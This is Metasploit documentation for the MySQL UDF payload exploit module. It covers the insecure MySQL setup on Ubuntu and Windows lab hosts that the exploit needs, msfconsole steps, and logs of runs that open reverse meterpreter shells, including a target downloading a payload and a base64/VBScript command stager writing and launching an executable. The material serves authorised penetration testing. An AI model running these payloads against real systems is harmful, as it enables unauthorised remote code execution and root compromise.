CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
Views: 1904

Vulnerable Application

This vulnerability exploits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. The Windows dll files are provided by @stamparm of the sqlmap project and are located here. As noted in #9677 these are 'de-cloaked' versions, which may attract AV attention.

The file is then loaded by mysql, and arbitrary commands can be run. There are several caveats for this to function however, including:

  1. secure_file_priv, a mysql setting, must be changed from the default to allow writing to mysql's plugins folder

  2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled. Equivalents on other linux systems most likely need the same

  3. the mysql folder must be writable

Linux (Ubuntu 16.04 x64) Configuration

In this configuration, we'll run mysql as root so we have a priv escalate.

  1. Edit /lib/systemd/system/mysql.service and set User=root

  2. Edit /etc/mysql/mysql.conf.d/mysqld.cnf. After the [mysqld] section, change user=mysql to user=root

  3. Edit /etc/mysql/mysql.conf.d/mysqld.cnf. After the [mysqld] section, add secure_file_priv=""

  4. Disable app-armor for mysql: sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld

  5. Restart mysql service: sudo systemctl restart mysql.service

If you need to make the root user accessible remotely

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
FLUSH PRIVILEGES;

or

update user set host='%' where host='127.0.0.1';

Windows (Server 2012 x64) Configuration

One good reference for these instructions is PR #5334

  1. Download and install mysql installer

  2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package.

  3. Edit C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini and change the value of secure-file-priv= to ""

  4. Make the C:\Program Files\MySQL\MySQL Server *\lib\plugin folder permissions writable by the MySQL (service) user.

If you need to make the root user accessible remotely

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
FLUSH PRIVILEGES;

or

update user set host='%' where host='127.0.0.1';

Verification Steps

  1. Install MySQL and make it vulnerable as described above

  2. Start msfconsole

  3. Do: use exploit/multi/mysql/mysql_udf_payload

  4. Do: set rhost [ip]

  5. Do: set srvhost [ip]

  6. Make sure target and payload are correct

  7. Set mysql login information

  8. Do: exploit

  9. You should get a shell.

Options

FORCE_UDF_UPLOAD

This option will force the uploading of a UDF dll/so file even if one exists which has a system call already

Scenarios

Ubuntu 16.04 with MySQL 5.7.20

In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root.

[*] Processing udf.rc for ERB directives.
resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (udf.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (udf.rc)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (udf.rc)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
resource (udf.rc)> set srvport 64423
srvport => 64423
resource (udf.rc)> set password wordpress
password => wordpress
resource (udf.rc)> set target 1
target => 1
resource (udf.rc)> set verbose true
verbose => true
msf exploit(mysql_udf_payload) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 2.2.2.2:3306 - Checking target architecture...
[*] 2.2.2.2:3306 - Checking for sys_exec()...
[*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG
[*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG
[*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu))
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (826872 bytes) to 2.2.2.2
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400
[-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream #<Socket:0x00561e7e1758e8> is closed.
[*] 2.2.2.2:3306 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(mysql_udf_payload) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 2.2.2.2
OS           :  (Linux 4.4.0-98-generic)
Architecture : x64
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0

Windows Server 2012 with MySQL 5.7.20

[*] Processing udf.rc for ERB directives.
resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
resource (udf.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (udf.rc)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
resource (udf.rc)> set srvport 64423
srvport => 64423
resource (udf.rc)> set verbose true
verbose => true
msf exploit(mysql_udf_payload) > set target 0
target => 0
msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mysql_udf_payload) > set rhost 3.3.3.3
rhost => 3.3.3.3
msf exploit(mysql_udf_payload) > set password mysql
password => mysql
msf exploit(mysql_udf_payload) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] 3.3.3.3:3306 - Checking target architecture...
[*] 3.3.3.3:3306 - Checking for sys_exec()...
[*] 3.3.3.3:3306 - Checking target architecture...
[*] 3.3.3.3:3306 - Checking for MySQL plugin directory...
[*] 3.3.3.3:3306 - Target arch (win64) and target path both okay.
[*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll...
[*] 3.3.3.3:3306 - Checking for sys_exec()...
[*] 3.3.3.3:3306 - Executing: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAyzSjSgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAB2HwAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
[*] 3.3.3.3:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)

...snip...

[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
[*] 3.3.3.3:3306 - Command Stager progress -  96.76% done (98934/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress -  98.19% done (100400/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If  Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress -  99.59% done (101827/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Sending stage (179267 bytes) to 3.3.3.3
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400

meterpreter > sysinfo
Computer        : WIN-OBKF2JFCDKL
OS              : Windows 2012 (Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows